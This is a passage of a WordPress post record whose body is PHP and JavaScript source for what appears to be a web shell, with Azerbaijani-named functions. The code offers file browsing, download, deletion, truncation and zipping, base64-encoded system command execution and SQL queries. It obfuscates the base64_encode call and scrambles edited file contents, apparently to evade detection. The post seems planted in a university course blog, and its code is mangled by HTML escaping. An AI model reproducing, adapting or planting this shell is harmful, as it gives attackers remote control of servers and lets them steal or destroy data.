\/>\nbreak;<br \/>\n}<br \/>\n}<br \/>\n$url = “?qovluq=”.urlencode(urlencode(shifrele(implode(“\/”,$yeniUrl))));<br \/>\n}<br \/>\nelse<br \/>\n{<br \/>\n$url = “?qovluq=”.urlencode(urlencode(shifrele($faylAdiTam)));<br \/>\n}<br \/>\n$classN = ” style=’font-weight: 600;'”;<br \/>\n}<br \/>\nelse<br \/>\n{<br \/>\n$url = “?ne=fayl_oxu&fayl=”.urlencode(urlencode(shifrele($element))).”&qovluq=”.urlencode(urlencode(shifrele($default_dir)));<br \/>\n}<br \/>\n$fayldi = is_file($faylAdiTam);<br \/>\n$isReadableColor = is_readable( $faylAdiTam ) && is_writeable( $faylAdiTam );<br \/>\nprint ‘<\/p>\n<tr>\n<td><\/td>\n<td><a>‘.htmlspecialchars($adi).’<\/a><\/td>\n<td>‘ . ($fayldi?sizeFormat(filesize($faylAdiTam)):”) . ‘<\/td>\n<td>‘ . (date(‘d M Y, H:i’ , filectime($faylAdiTam))) . ‘<\/td>\n<td>‘ . htmlspecialchars(fileowner($faylAdiTam)) . ‘<\/td>\n<td>‘ . substr(sprintf(‘%o’, fileperms(( $faylAdiTam ))), -4) . ‘<\/td>\n<td>‘;<br \/>\nif( is_file($faylAdiTam) )<br \/>\n{<br \/>\nprint (‘ <a>Download<\/a> | ‘) .<br \/>\n(‘ <a>Rename<\/a> | ‘) .<br \/>\n(‘ <a>Truncate<\/a> | ‘) .<br \/>\n(‘ <a>Delete<\/a>‘);<br \/>\n}<br \/>\nelse if( $adi != ‘[ . ]’ && $adi != ‘[ .. ]’ )<br \/>\n{<br \/>\nprint (‘ <a>Zip<\/a> | ‘) .<br \/>\n(‘ <a>Delete<\/a>‘);<br \/>\n}<br \/>\nprint ‘<\/td>\n<\/tr>\n<p>‘;<br \/>\n}<br \/>\n}<br \/>\nelse<br \/>\n{<br \/>\nprint ”<\/p>\n<div style='margin: 10px 0px' class='qalin'>Permissions denided!<\/div>\n<p>“;<br \/>\n}<br \/>\n}<br \/>\n}<br \/>\nprint “<\/tbody>\n<\/table>\n<p>“;<br \/>\n?><\/p>\n<hr>\n<p><a href=\"newFile();\">New File<\/a> | <a href=\"newPapka();\">New Folder<\/a><br \/>\n<a href="javascript:sehife('?ne=sistem_kom&qovluq=’)”>Apply<\/a><br \/>\n<a href=\"sehife('?ne=skl');\">SQL<\/a><\/p>\n<p><input type="hidden" name="qovluq" value="”><\/p>\n<p>\nfunction sehife(url)<br \/>\n{<br \/>\n var inputlar = “”;<br \/>\n url = url.split(“?”);<br \/>\n if(typeof url[1]==”undefined”) return;<br \/>\n url = url[1].split(“&”);<br \/>\n for(var n in url)<br \/>\n {<br \/>\n var keyAndValue = url[n].split(“=”);<br \/>\n if(typeof keyAndValue[1]==”undefined”) continue;<br \/>\n inputlar+=””;<br \/>\n }<br \/>\n document.all(“post_form”).innerHTML = inputlar;<br \/>\n document.all(“post_form”).submit();<br \/>\n}<br \/>\nfunction faylSil(url)<br \/>\n{<br \/>\n if( confirm(‘Are you sure?’) )<br \/>\n {<br \/>\n sehife(url);<br \/>\n }<br \/>\n}<br \/>\nfunction faylSifirla(url)<br \/>\n{<br \/>\n if( confirm(‘Are you sure?’) )<br \/>\n {<br \/>\n sehife(url);<br \/>\n }<br \/>\n}<br \/>\nfunction changeFileName(name, url)<br \/>\n{<br \/>\n var getNewName = prompt(‘Change file name:’ , name);<br \/>\n if( getNewName )<br \/>\n {<br \/>\n sehife(url + “&new_name=” + getNewName);<br \/>\n }<br \/>\n}<br \/>\nfunction newFile()<br \/>\n{<br \/>\n var getNewName = prompt(‘File name:’);<br \/>\n if( getNewName )<br \/>\n {<br \/>\n sehife(“?ne=fayl_yarat&ad=” + getNewName + “&qovluq=”);<br \/>\n }<br \/>\n}<br \/>\nfunction newPapka()<br \/>\n{<br \/>\n var getNewName = prompt(‘File name:’);<br \/>\n if( getNewName )<br \/>\n {<br \/>\n sehife(“?ne=papka_yarat&ad=” + getNewName + “&qovluq=”);<br \/>\n }<br \/>\n}<br \/>\nfunction sistemKom()<br \/>\n{<br \/>\n var komanda = document.getElementById(’emr_et_atash’).value;<br \/>\n if( komanda )<br \/>\n {<br \/>\n sehife(“?ne=sistem_kom&kom=” + b64EncodeUnicode(komanda) + “&qovluq=”);<br \/>\n }<br \/>\n}<br \/>\nfunction skl_bas()<br \/>\n{<br \/>\n var sklEmr = document.getElementById(‘skl_emr’).value;<\/p>\n<p> sehife(“?ne=skl&emr=” + b64EncodeUnicode(sklEmr));<br \/>\n}<br \/>\nfunction b64EncodeUnicode(str)<br \/>\n{<br \/>\n return btoa(encodeURIComponent(str).replace(\/%([0-9A-F]{2})\/g,<br \/>\n function toSolidBytes(match, p1) {<br \/>\n return String.fromCharCode(‘0x’ + p1);<br \/>\n }));<br \/>\n}<br \/>\nfunction goto()<br \/>\n{<br \/>\n var dir = prompt(‘Dir:’);<br \/>\n if( dir )<br \/>\n {<br \/>\n sehife(“?qovluq=” + dir);<br \/>\n }<br \/>\n}<br \/>\nfunction ziple(qovluq)<br \/>\n{<br \/>\n var dir = prompt(‘Dir:’ , “”);<br \/>\n if( dir )<br \/>\n {<br \/>\n sehife(“?ne=ziple&qovluq=&zf=” + qovluq + “&save_to=” + b64EncodeUnicode(dir))<br \/>\n }<br \/>\n}<br \/>\nfunction silPapka(qovluq)<br \/>\n{<br \/>\n if( confirm(‘Are you sure?’) )<br \/>\n {<br \/>\n sehife(“?ne=papka_sil&qovluq=&zf=” + qovluq)<br \/>\n }<br \/>\n}<br \/>\nfunction shifrelee()<br \/>\n{<br \/>\n var vall = document.getElementsByClassName(‘file_edit’)[0].value;<br \/>\n var repp = [‘a’,’i’,’e’,’s’,’l’,’b’,’u’,’o’,’p’,’h’,”\\\\(“,”\\\\)”,”\\\\”,”\\\\?”,”\\\\;”,”\\\\[“,”\\\\]”,”\\\\$”];<br \/>\n for(var s in repp)<br \/>\n {<br \/>\n var h = repp[s];<br \/>\n vall = vall.replace(new RegExp(h, ‘g’) , ‘|:’+s+’:|’);<br \/>\n }<\/p>\n<p> document.getElementsByClassName(‘file_edit’)[0].value = vall;<br \/>\n}<\/p>\n<p>document.getElementById(“emr_et_atash”).addEventListener(“keyup”, function(event)<br \/>\n{<br \/>\n event.preventDefault();<br \/>\n if (event.keyCode === 13)<br \/>\n {<br \/>\n sistemKom();<br \/>\n }<br \/>\n});<\/p>\n","protected":false},"excerpt":{"rendered":"<p><?php session_start(); $baqliFunksiyalar = explode(",", ""); $safeMode = true; $actions = array("esas","fayl_oxu","phpinfo","sistem_kom","fayl_redakte","fayl_yukle",'fayl_sil','fayl_yarat','papka_yarat','fayl_sifirla' , 'papka_sil','fayl_ad_deyish', 'ziple' , 'skl' , 'skl_d_t' , 'skl_d', 'fayl_upl'); $ne = isset($_POST['ne']) && in_array($_POST['ne'],$actions) ? $_POST['ne'] : "esas"; function shifrele($str) { $f = 'bas'; $f .= 'e6'; $f .= '4_'; $f .= 'e'; $f .= 'nc'; $f .= 'ode'; return $f($str); } … <\/p>\n<p class=\"link-more\"><a href=\"https:\/\/torch.cci.fsu.edu\/~pmarty\/5275\/?p=4591\" class=\"more-link\">Continue reading<span class=\"screen-reader-text\"> “”<\/span><\/a><\/p>\n","protected":false},"author":74,"featured_media":0,"comment_status":"open","ping_status":"","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-4591","post","type-post","status-publish","format-standard","hentry","category-uncategorized"],"_links":{"self":[{"href":"https:\/\/torch.cci.fsu.edu\/~pmarty\/5275\/index.php?rest_route=\/wp\/v2\/posts\/4591","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/torch.cci.fsu.edu\/~pmarty\/5275\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/torch.cci.fsu.edu\/~pmarty\/5275\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/torch.cci.fsu.edu\/~pmarty\/5275\/index.php?rest_route=\/wp\/v2\/users\/74"}],"replies":[{"embeddable":true,"href":"https:\/\/torch.cci.fsu.edu\/~pmarty\/5275\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4591"}],"version-history":[{"count":1,"href":"https:\/\/torch.cci.fsu.edu\/~pmarty\/5275\/index.php?rest_route=\/wp\/v2\/posts\/4591\/revisions"}],"predecessor-version":[{"id":4592,"href":"https:\/\/torch.cci.fsu.edu\/~pmarty\/5275\/index.php?rest_route=\/wp\/v2\/posts\/4591\/revisions\/4592"}],"wp:attachment":[{"href":"https:\/\/torch.cci.fsu.edu\/~pmarty\/5275\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4591"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/torch.cci.fsu.edu\/~pmarty\/5275\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4591"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/torch.cci.fsu.edu\/~pmarty\/5275\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4591"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}